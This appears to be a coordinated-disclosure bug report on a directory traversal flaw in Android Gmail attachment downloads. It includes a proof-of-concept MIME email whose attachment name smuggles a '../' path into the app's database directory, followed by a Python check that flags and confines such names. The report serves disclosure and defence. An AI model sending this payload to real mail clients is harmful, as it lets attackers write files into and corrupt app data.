Status: Fixed
Closed: Nov 28
Android Gmail: Directory Traversal in Attachment Download
Project Member Reported by natashenka@google.com, Aug 24
There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations:

1) the email address has to be a non-Gmail and non-Gmailified (Hotmail or Yahoo) account
2) the file cannot overwrite an existing file; it has to be a file that doesn't already exist
3) the user has to click to download the attachment (and the path looks a bit weird on the screen)

It is possible to modify an EmailProviderBody database using this bug by placing a journal file in the databases directory.

Below is a PoC of an email that causes this issue. Attached is a Python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again.

Content-Type: multipart/mixed; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello
To: <address>
From: natashenka@google.com

You will not see this in a MIME-aware mail reader.

------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html

<html><body><b>test</b></body></html>

------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="test"


------714A286D976BF3E58D9D671E37CBCF7C

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Attachment: traversal.py (2.1 KB)
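The defender-side check this report calls for, as an added Python example that is not part of the report or its attached traversal.py: it reads both the Content-Type `name` parameter and the Content-Disposition `filename` of each attachment part (the PoC above carries the traversal string in the former while the latter says "test"), flags traversal, and maps an untrusted name onto a path confined to a download directory. The MIME sample, its boundary, the placeholder body and the download directory are constructed for the example.

```python
import email
import os
import posixpath
from email import policy

# Constructed sample modelled on the report's PoC: the traversal sits in the
# Content-Type "name" parameter while Content-Disposition carries "test".
# Boundary and base64 body are placeholders, not the original payload.
SAMPLE_MIME = """\
Content-Type: multipart/mixed; boundary="----BOUNDARY"
Subject: hello

------BOUNDARY
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="test"

cGxhY2Vob2xkZXI=

------BOUNDARY--
"""

def attachment_names(raw):
    """Return (Content-Type name, Content-Disposition filename) per attachment part."""
    msg = email.message_from_string(raw, policy=policy.default)
    names = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        # get_filename() prefers Content-Disposition and only falls back to
        # name=; a client that reads name= directly sees the traversal string.
        names.append((part.get_param("name"), part.get_filename()))
    return names

def is_traversal(name):
    """True unless the advertised name is a single, plain path component."""
    normalised = name.replace("\\", "/")
    return "/" in normalised or normalised in ("", ".", "..")

def safe_attachment_path(download_dir, advertised_name):
    """Map an untrusted attachment name onto a file path confined to download_dir."""
    base = posixpath.basename(advertised_name.replace("\\", "/"))
    if base in ("", ".", ".."):
        base = "attachment"
    root = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(root, base))
    # Belt and braces: the resolved path must still sit under download_dir.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("attachment path escapes download directory")
    return target
```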
Project Member Comment 1 by natashenka@google.com, Nov 28
Labels: -Restrict-View-Commit
Status: Fixed
This has been fixed, and the Gmail team included this response:

"We'd like to thank Project Zero for the coordinated disclosure of this security vulnerability. The Android Gmail app has been patched as of the latest version released through the Google Play Store on November 22, 2017 (version 7.11.5.176568039). Users have been automatically updated through the Google Play Store. We have no reports of any exploitation of this issue."